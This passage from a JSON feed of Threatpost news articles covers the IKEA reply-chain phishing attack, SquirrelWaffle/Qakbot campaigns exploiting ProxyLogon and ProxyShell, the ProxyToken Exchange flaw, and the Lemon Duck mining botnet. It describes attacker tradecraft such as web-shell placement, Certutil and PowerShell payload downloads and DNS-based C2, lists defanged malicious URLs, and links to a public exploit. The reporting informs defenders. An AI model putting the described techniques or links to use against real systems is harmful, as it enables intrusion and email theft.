use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? Some say yes, some say no.\n\nErich Kron, security awareness advocate at [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkwmuP_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r2sgW-2Be451MnVYlMzEVQ43u-2Fx2JCoSpeITOcIPo6Gi3VBNSVcUaapZzArkSDh5SZ2Cih-2F-2FVdRBgHXCsqyWXs7po0-2FS83TsiYRB3U8HOgtt0HT6BGdSMjxi-2FVc6P1ZgVny6ZGKAKxbHvydLCfU5zrtFQ-3D>), is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. \u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\u201d\n\nIn contrast, Christian Espinosa, managing director of [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PeL3x_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r8Wex0T7OFTT8vFIbMA9T-2BlDgGhDFXEelC-2FWPjZXKe9NWtbBbYafHTvkVre5k1vKi3GgofOJKSR-2F2xlpyW7kQklpPEA59unEm4rAKnCodaK-2FrXGwLA5yk9gY1MBMzuyaJeG4mVY1yL-2F3YI1d-2BMmcWiY-3D>), is a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespite awareness campaigns, the transportation industry realized that many people did not \u2018look\u2019 before turning across traffic at a green light,\u201d Espinosa said. \u201cInstead of blaming the drivers, the industry changed the traffic lights. The newer lights prevent drivers from turning across traffic unless there is a green arrow.\u201d\n\nThis change saved thousands of lives, he said, and it\u2019s high time that the cybersecurity industry similarly \u201ctakes ownership.\u201d\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-29T21:22:12", "type": "threatpost", "title": "IKEA Hit by Email Reply-Chain Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-29T21:22:12", "id": "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "href": "https://threatpost.com/ikea-email-reply-chain-attack/176625/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-23T00:36:02", "description": "Attackers are gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads, researchers say.\n\nWhat\u2019s still under discussion: whether the offensive is delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle is just one piece of malware among several that the campaigns are dropping.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\n## Slipping Under People\u2019s Noses\n\nIn a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) posted on Friday, Trend Micro researchers \u200b\u200bMohamed Fahmy, Sherif Magdy and Abdelrhman Sharshar said that hijacking email replies for malspam is a good way to slip past both people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\n\u201cDelivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail [gateways] will not be able to filter or quarantine any of these internal emails,\u201d they wrote.\n\nThe attacker also didn\u2019t drop, or use, tools for lateral movement after gaining access to the vulnerable Exchange servers, Trend Micro said. Thus, they left no tracks, as \u201cno suspicious network activities will be detected. Additionally, no malware was executed on the Exchange servers that will trigger any alerts before the malicious email is spread across the environment.\u201d\n\n## Middle East Campaign\n\nTrend Micro\u2019s Incident Response team had decided to look into what researchers believe are SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious Exchange server vulnerabilities.\n\nThey shared a screen capture, shown below, that\u2019s representative of the malicious email replies that showed up in all of the user inboxes of one affected network, all sent as legitimate replies to existing threads, all written in English.\n\nThey found that other languages were used in different regions outside of the Middle East attack they examined. Still, in the intrusions they analyzed that were outside of the Middle East, most of the malicious emails were written in English, according to the report.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22101946/malicious-spam-received-by-targets-e1637594408162.png>)\n\nMalicious spam received by targets. Source: Trend Micro.\n\n\u201cWith this, the attackers would be able to hijack legitimate email chains and send their malicious spam as replies to the said chains,\u201d the researchers wrote.\n\n## Who\u2019s Behind This?\n\n[Cryptolaemus](<https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/>) researcher [TheAnalyst](<https://twitter.com/ffforward>) disagreed with Trend Micro on its premise that SquirrelWaffle is actually acting as a malware dropper for Qbot or other malwares. Rather, TheAnalyst asserted on Friday that the threat actor is dropping both SquirrelWaffle and Qbot as [discrete payloads](<https://twitter.com/ffforward/status/1461810466720825352>), and the most recent [confirmed SquirrelWaffle drop](<https://twitter.com/ffforward/status/1461810488870944768>) it has seen was actually on Oct. 26.\n\n> it makes it easy for us who tracks them to identify them. A TTP they always comes back to is links to maldocs in stolen reply chains. They are known to deliver a multitude of malware like [#QakBot](<https://twitter.com/hashtag/QakBot?src=hash&ref_src=twsrc%5Etfw>) [#Gozi](<https://twitter.com/hashtag/Gozi?src=hash&ref_src=twsrc%5Etfw>) [#IcedID](<https://twitter.com/hashtag/IcedID?src=hash&ref_src=twsrc%5Etfw>) [#CobaltStrike](<https://twitter.com/hashtag/CobaltStrike?src=hash&ref_src=twsrc%5Etfw>) and maybe others. >\n> \n> \u2014 TheAnalyst (@ffforward) [November 19, 2021](<https://twitter.com/ffforward/status/1461810468323004417?ref_src=twsrc%5Etfw>)\n\nWith regards to who\u2019s behind the activity, TheAnalyst said that the actor/activity is tracked as tr01/TR (its QakBot affiliate ID)[ TA577](<https://twitter.com/hashtag/TA577?src=hashtag_click>) by Proofpoint and as ChaserLdr by[ Cryptolaemus](<https://twitter.com/Cryptolaemus1>) and that the activity goes back to at least 2020. The actors are easy to track, TheAnalyst said, given small tweaks to their tactics, techniques and procedures (TTPs).\n\nOne such TTP that tr01 favors is adding links to malicious documents included in stolen reply chains, TheAnalyst noted. The threat actor is known to deliver \u201ca multitude of malware,\u201d they said, such as [QakBot](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>), [Gozi](<https://threatpost.com/banking-trojans-nymaim-gozi-merge-to-steal-4m/117412/>), [IcedID](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), Cobalt Strike and potentially more.\n\n## The Old \u2018Open Me\u2019 Excel Attachment Trick\n\nThe malicious emails carried links (aayomsolutions[.]co[.]in/etiste/quasnam[]-4966787 and aparnashealthfoundation[.]aayom.com/quasisuscipit/totamet[-]4966787) that dropped a .ZIP file containing a malicious Microsoft Excel sheet that downloads and executes a malicious DLL related to the [Qbot](<https://threatpost.com/ta551-tactics-sliver-red-teaming/175651/>) banking trojan.\n\nWhat\u2019s particularly notable, Trend Micro said, is that real account names from the victim\u2019s domain were used as sender and recipient, \u201cwhich raises the chance that a recipient will click the link and open the malicious Microsoft Excel spreadsheets,\u201d according to the report.\n\nAs shown below, the Excel attachment does [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompts targets to choose \u201cEnable Content\u201d to view a protected file.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nTrend Micro offered the chart below, which shows the Excel file infection chain.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22132511/Excel_file_infection_chain__Source-_Trend_Micro_-e1637605525630.jpg>)\n\nExcel file infection chain. Source: Trend Micro.\n\n## The Exchange Tell-Tales\n\nThe researchers believe that the actors are pulling it off by targeting users who are relying on Microsoft Exchange servers that haven\u2019t yet been patched for the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) vulnerabilities.\n\nTrend Micro found evidence in the IIS logs of three compromised Exchange servers, each compromised in a separate intrusion, all having been exploited via the vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 the same CVEs used in ProxyLogon (CVE-2021-26855) and ProxyShell (CVE-2021-34473 and CVE-2021-34523) intrusions, according to Trend Micro.\n\nThe IIS log also showed that the threat actor is using a [publicly available](<https://github.com/Jumbo-WJB/Exchange_SSRF>) exploit in its attack. \u201cThis exploit gives a threat actor the ability to get users SID and emails,\u201d the researchers explained. \u201cThey can even search for and download a target\u2019s emails.\u201d\n\nThe researchers shared evidence from the IIS logs, replicated below, that depicts the exploit code.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22125426/Exploiting-CVE-2021-26855-as-seen-in-the-IIS-logs-e1637603679782.png>)\n\nExploiting CVE-2021-26855, as demonstrated by the IIS logs. Source: Trend Micro.\n\nMicrosoft fixed the ProxyLogon vulnerabilities in [March](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) and the ProxyShell vulnerabilities in [May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>). Those who\u2019ve applied the [May or July](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) updates are protected from all of these. Microsoft has [reiterated](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) that those who\u2019ve applied the ProxyLogon patch released in [March](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) aren\u2019t protected from ProxyShell vulnerabilities and should install the more recent security updates.\n\n## How to Fend Off ProxyLogon/ProxyShell Attacks\n\nExploiting ProxyLogon and ProxyShell enabled the attackers to slip past checks for malicious email, which \u201chighlights how users [play] an important part in the success or failure of an attack,\u201d Trend Micro observed. These campaigns \u201cshould make users wary of the different tactics used to mask malicious emails and files,\u201d the researchers wrote.\n\nIn other words, just because email comes from a trusted contact is no guarantee that any attachment or link it contains can be trusted, they said.\n\nOf course, patching is the number one way to stay safe, but Trend Micro gave these additional tips if that\u2019s not possible:\n\n * Enable virtual patching modules on all Exchange servers to provide critical level protection for servers that have not yet been patched for these vulnerabilities.\n * Use endpoint detection and response (EDR) solutions in critical servers, as it provides visibility to machine internals and detects any suspicious behavior running on servers.\n * Use endpoint protection design for servers.\n * Apply sandbox technology on email, network and web to detect similar URLs and samples.\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. REGISTER TODAY to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. **_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-22T19:26:25", "type": "threatpost", "title": "Attackers Hijack Email Using Proxy Logon/Proxyshell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-22T19:26:25", "id": "THREATPOST:836083DB3E61D979644AE68257229776", "href": "https://threatpost.com/attackers-hijack-email-threads-proxylogon-proxyshell/176496/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. These requests contain a SecurityToken cookie that identify them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain comprised of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T06:29:15", "description": "The Lemon Duck cryptocurrency-mining botnet has added the [ProxyLogon group of exploits](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) to its bag of tricks, targeting Microsoft Exchange servers.\n\nThat\u2019s according to researchers at Cisco Talos, who said that the cybercrime group behind Lemon Duck has also added the Cobalt Strike attack framework into its malware toolkit and has beefed up anti-detection capabilities. On the latter front, it\u2019s using fake domains on East Asian top-level domains (TLDs) to hide command-and-control (C2) infrastructure.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nLemon Duck targets victims\u2019 computer resources to mine the Monero virtual currency, with self-propagating capabilities and a modular framework that allows it to infect additional systems that become part of the botnet. It has been active since at least the end of December 2018, and Cisco Talos calls it \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve.\n\nFor instance, Lemon Duck has at least 12 different initial-infection vectors \u2013 more than most malware, with Proxylogon exploits only the latest addition. Its existing capabilities ranged from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing; targeting the RDP BlueKeep flaw (CVE-2019-0708) in Windows machines; [targeting internet-of-things devices](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) with weak or default passwords; and exploiting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n\u201cSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the Lemon Duck that target unpatched Microsoft Exchange Servers and attempt to download and execute payloads for Cobalt Strike DNS beacons,\u201d according to [an analysis](<https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html>) released Friday.\n\nCisco Talos researchers [previously observed](<https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/>) an increase in DNS requests connected with Lemon Duck\u2019s C2 and mining servers last August, with the attacks mainly targeting Egypt, India, Iran, the Philippines and Vietnam. In the latest rash of attacks, which began in April, the group has changed up its geographic targets to focus primarily on North America, followed by Europe and Southeast Asia, and a handful of victims in Africa and South America.\n\n## **Targeting Exchange Servers with Monero-Mining**\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the deployment of ransomware.\n\nThe highly publicized exploit chain suffered a barrage of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to info-stealers, and now financially motivated groups are getting in on the action too.\n\nIn Lemon Duck\u2019s case, once the Exchange servers are compromised, it executes various system commands using the Windows Control Manager (sc.exe), including copying two .ASPX files named \u201cwanlins.aspx\u201d and \u201cwanlin.aspx.\u201d\n\n\u201cThese files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a known directory where a majority of the web shells were initially observed following Microsoft\u2019s release of details related to Hafnium activity,\u201d according to the research.\n\nNext, Cisco Talos researchers observed the echo command being used to write code associated with a web shell into the previously created ASPX files, and the modification of the Windows registry to enable RDP access to the system.\n\n\u201cIn this case, several characteristics matched portions of code associated with known China Chopper variants identified days after the Exchange Server vulnerabilities were publicized,\u201d they noted.\n\nOther interesting aspects of the latest campaign include the fact that Lemon Duck executes a PowerShell script that downloads and executes an additional malware payload, \u201csyspstem.dat,\u201d which includes a \u201ckiller\u201d module which contains a hardcoded list of competing cryptocurrency miners that Lemon Duck disables. The module is run every 50 minutes.\n\nAlso, the malware is now leveraging Certutil to download and execute two new malicious PowerShell scripts, researchers said. Certutil is a native Windows command-line program that is installed as part of Certificate Services. It is used to verify and dump Certificate Authority (CA) information, get and publish new certificate revocation lists, and so on.\n\nOne of the PowerShell scripts, named \u201cdn.ps1,\u201d attempts to uninstall multiple antivirus products, and also retrieves a Cobalt Strike payload.\n\n## **Cobalt Strike Added to the Mix**\n\n[Cobalt Strike is a penetration-testing tool](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) that\u2019s commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it [simulates an attack](<https://www.cobaltstrike.com/features>). Threat actors have since figured out how to [turn it against networks](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to exfiltrate data, deliver malware and create fake C2 profiles that look legitimate and avoid detection.\n\nLemon Duck\u2019s Cobalt Strike payload is configured as a Windows DNS beacon and attempts to communicate with the C2 server using a DNS-based covert channel, researchers noted. The beacon then communicates with this specific subdomain to transmit encoded data via DNS A record query requests.\n\n\u201cThis represents a new TTP for Lemon Duck, and is another example of their reliance [on offensive security tools (OSTs)](<https://threatpost.com/malicious-software-infrastructure-easier-deploy/162913/>), including Powersploit\u2019s reflective loader and a modified Mimikatz, which are already included as additional modules and components of Lemon Duck and used throughout the typical attack lifecycle,\u201d according to Cisco Talos.\n\n## **Lemon Duck\u2019s Fresh Anti-Detection Tricks**\n\nWhile Lemon Duck casts a wide net in terms of victimology, it has been exclusively using websites within the TLDs for China (\u201c.cn\u201d), Japan (\u201c.jp\u201d) and South Korea (\u201c.kr\u201d) for its C2 activities since February, rather than the more familiar \u201c.com\u201d or \u201c.net.\u201d\n\n\u201cConsidering these [TLDs] are most commonly used for websites in their respective countries and languages\u2026this may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments,\u201d according to Cisco Talos. \u201cDue to the prevalence of domains using these [TLDs], web traffic to the domains\u2026may be more easily attributed as noise to victims within these countries.\u201d\n\nDuring the Lemon Duck infection process, PowerShell is used to invoke the \u201cGetHostAddresses\u201d method from the .NET runtime class \u201cNet.Dns\u201d to obtain the current IP address for an attacker-controlled domain, researchers explained.\n\n\u201cThis IP address is combined with a fake hostname hardcoded into the PowerShell command and written as an entry to the Windows hosts file,\u201d they said. \u201cThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the translation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such as DNS servers. This may allow the adversary to achieve longer-term persistence once operational in victim environments.\u201d\n\n## **Cryptojackers Take Notice of ProxyLogon**\n\nLemon 